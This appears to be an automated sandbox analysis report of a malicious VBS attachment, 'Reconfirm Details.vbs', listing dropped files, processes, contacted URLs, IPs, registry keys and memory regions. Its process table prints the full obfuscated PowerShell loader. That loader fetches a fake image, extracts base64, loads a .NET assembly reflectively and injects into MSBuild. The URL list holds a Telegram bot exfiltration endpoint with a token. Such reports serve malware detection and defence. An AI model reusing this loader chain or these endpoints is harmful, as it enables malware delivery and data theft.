Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Reconfirm Details.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IKfbD[1].txt
|
Unicode text, UTF-8 text, with very long lines (11914), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnna2vo0.dcc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc0uihon.fuc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcyjm0ui.heo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wur450uw.1gf.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebgBvDgTreGgDgTreLwBiDgTreGEDgTreLwBtDgTreG8DgTreYwDgTreuDgTreG8DgTreYwBzDgTreG4DgTrebwBzDgTreGgDgTrebQDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))}
}"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://mhsonsco.com/ab/hon.txt
|
103.83.81.68
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
172.67.215.45
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://uploaddeimagens.com.br/images/004/773/797/original/P
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://paste.ee/d/IKfbDJ
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument
|
149.154.167.220
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://paste.ee/d/IKfbDuser
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://lesferch.github.io/DesktopPic
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://paste.ee/d/IKfbD
|
104.21.84.67
|
||
|
https://paste.ee/d/IKfbD-
|
unknown
|
||
|
https://paste.ee/d/IKfbDm
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
https://paste.ee/d/IKfbD)
|
unknown
|
||
|
https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
uploaddeimagens.com.br
|
172.67.215.45
|
|
|
|
mhsonsco.com
|
103.83.81.68
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
paste.ee
|
104.21.84.67
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.211.108
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.83.81.68
|
mhsonsco.com
|
India
|
|
|
|
172.67.215.45
|
uploaddeimagens.com.br
|
United States
|
|
|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
104.21.84.67
|
paste.ee
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
32AA000
|
trusted library allocation
|
page read and write
|
|
|
|
3241000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
328E000
|
trusted library allocation
|
page read and write
|
|
|
|
2B956830000
|
remote allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
2B95709F000
|
heap
|
page read and write
|
||
|
2B957400000
|
heap
|
page read and write
|
||
|
2B9549EA000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B9549E8000
|
heap
|
page read and write
|
||
|
5680000
|
trusted library allocation
|
page read and write
|
||
|
20D258F0000
|
heap
|
page read and write
|
||
|
533D000
|
stack
|
page read and write
|
||
|
1454000
|
trusted library allocation
|
page read and write
|
||
|
5760000
|
heap
|
page read and write
|
||
|
7349A7E000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
14283D48000
|
trusted library allocation
|
page read and write
|
||
|
20D3F969000
|
heap
|
page read and write
|
||
|
64E7000
|
heap
|
page read and write
|
||
|
12F9000
|
stack
|
page read and write
|
||
|
5C2D000
|
stack
|
page read and write
|
||
|
151BB7E000
|
stack
|
page read and write
|
||
|
20D3FA0D000
|
heap
|
page read and write
|
||
|
2B9573FF000
|
heap
|
page read and write
|
||
|
2B95705D000
|
heap
|
page read and write
|
||
|
2B957300000
|
heap
|
page read and write
|
||
|
2B954C28000
|
heap
|
page read and write
|
||
|
2B956756000
|
heap
|
page read and write
|
||
|
32B9000
|
trusted library allocation
|
page read and write
|
||
|
20D27A51000
|
trusted library allocation
|
page read and write
|
||
|
7349AFE000
|
stack
|
page read and write
|
||
|
5CC0000
|
trusted library allocation
|
page read and write
|
||
|
2B95709F000
|
heap
|
page read and write
|
||
|
6548000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
20D27E88000
|
trusted library allocation
|
page read and write
|
||
|
20D37930000
|
trusted library allocation
|
page read and write
|
||
|
FF2CCFE000
|
stack
|
page read and write
|
||
|
2B95671C000
|
heap
|
page read and write
|
||
|
2B95672E000
|
heap
|
page read and write
|
||
|
6D50000
|
heap
|
page read and write
|
||
|
7FF848C9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
151C1FE000
|
stack
|
page read and write
|
||
|
2B95706C000
|
heap
|
page read and write
|
||
|
2B954A32000
|
heap
|
page read and write
|
||
|
568E000
|
trusted library allocation
|
page read and write
|
||
|
20D25AE0000
|
heap
|
page read and write
|
||
|
2B954950000
|
heap
|
page read and write
|
||
|
5692000
|
trusted library allocation
|
page read and write
|
||
|
7349B7E000
|
stack
|
page read and write
|
||
|
2B957409000
|
heap
|
page read and write
|
||
|
151CCCD000
|
stack
|
page read and write
|
||
|
20D27D2A000
|
trusted library allocation
|
page read and write
|
||
|
14283CF5000
|
trusted library allocation
|
page read and write
|
||
|
7DF41D7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D27340000
|
heap
|
page readonly
|
||
|
14280001000
|
trusted library allocation
|
page read and write
|
||
|
2B9570F4000
|
heap
|
page read and write
|
||
|
158C000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B957211000
|
heap
|
page read and write
|
||
|
5750000
|
heap
|
page execute and read and write
|
||
|
7349DFE000
|
stack
|
page read and write
|
||
|
20D278E0000
|
heap
|
page execute and read and write
|
||
|
1578000
|
heap
|
page read and write
|
||
|
14282BE1000
|
trusted library allocation
|
page read and write
|
||
|
14283D99000
|
trusted library allocation
|
page read and write
|
||
|
7349CFF000
|
stack
|
page read and write
|
||
|
20D25986000
|
heap
|
page read and write
|
||
|
20D3FBC0000
|
heap
|
page read and write
|
||
|
2B957403000
|
heap
|
page read and write
|
||
|
145D000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D37921000
|
trusted library allocation
|
page read and write
|
||
|
2B9573FF000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
20D259AA000
|
heap
|
page read and write
|
||
|
20D25989000
|
heap
|
page read and write
|
||
|
7FF848BE4000
|
trusted library allocation
|
page read and write
|
||
|
20D27A4E000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
1796000
|
heap
|
page read and write
|
||
|
2B95727B000
|
heap
|
page read and write
|
